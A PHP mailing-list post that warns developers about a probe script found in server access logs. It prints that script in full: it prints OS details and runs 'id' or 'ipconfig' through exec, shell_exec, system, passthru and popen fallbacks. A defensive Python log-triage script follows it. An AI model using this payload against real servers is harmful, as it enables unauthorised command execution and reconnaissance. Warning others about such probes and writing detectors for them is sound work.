I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as an XSS
attack(?)

<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>";
echo "<h2>SysOSx:$ker</h2></br>";
echo "<h2>SysOSx:$osx</h2></br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
        $res = '';
        if (!empty($cfe))
        {
                if(function_exists('exec'))
                {
                        @exec($cfe,$res);
                        $res = join("\n",$res);
                }
                elseif(function_exists('shell_exec'))
                {
                        $res = @shell_exec($cfe);
                }
                elseif(function_exists('system'))
                {
                        @ob_start();
                        @system($cfe);
                        $res = @ob_get_contents();
                        @ob_end_clean();
                }
                elseif(function_exists('passthru'))
                {
                        @ob_start();
                        @passthru($cfe);
                        $res = @ob_get_contents();
                        @ob_end_clean();
                }
                elseif(@is_resource($f = @popen($cfe,"r")))
                {
                        $res = "";
                        while(!@feof($f)) { $res .= @fread($f,1024); }
                        @pclose($f);
                }
        }
        return $res;
}
?>

So far, it is coming from http://www.vesprokat.ru/n and 
http://www.goodasgold.com

Be aware and check that your files are not vulnerable, although they are only
going to get your users and groups info, as well as OS, you should all look
out for this.

--Paul
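
Added example, not part of the original message: a log triage script that lists requests in which a query-string parameter carries an absolute remote URL, so the affected scripts and parameters can be reviewed. It assumes Apache combined log format and that the remote script URL arrived as a parameter value; the log lines, hosts and addresses are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (Apache combined format); hosts and addresses are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2008:10:00:05 +0200] "GET /index.php?page=http://remote.example/n? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [01/Jan/2008:10:00:06 +0200] "GET /view.php?file=http%3A%2F%2Fremote.example%2Fn%3F HTTP/1.1" 404 209 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [01/Jan/2008:10:02:41 +0200] "GET /gallery.php?lang=en&inc=HTTP%253A%252F%252Fother.example%252Fn HTTP/1.1" 200 730 "-" "-"',
    '192.0.2.10 - - [01/Jan/2008:10:03:00 +0200] "GET /css/site.css HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# Only the client, request target and status are needed from each line.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://([^/?#\s]+)', re.IGNORECASE)

def decode(value, rounds=2):
    """Undo extra layers of percent-encoding, with a bounded number of passes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip()

def find_remote_url_params(lines):
    """Return (line_no, client, parameter, remote_host, status) for each suspect parameter."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        query = urlsplit(m['target']).query
        # parse_qsl already percent-decodes once; decode() handles double encoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            remote = REMOTE_RE.match(decode(value))
            if remote:
                hits.append((line_no, m['client'], name,
                             remote.group(1).lower(), int(m['status'])))
    return hits

if __name__ == '__main__':
    for hit in find_remote_url_params(SAMPLE_LOG):
        print('line %d: client=%s param=%s remote_host=%s status=%d' % hit)
```

Legitimate parameters that carry URLs (redirect targets, share links) will also be listed, so treat the output as candidates for review and check what each script does with the flagged parameter.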



-- 
PHP General Mailing List (http://www.php.net/)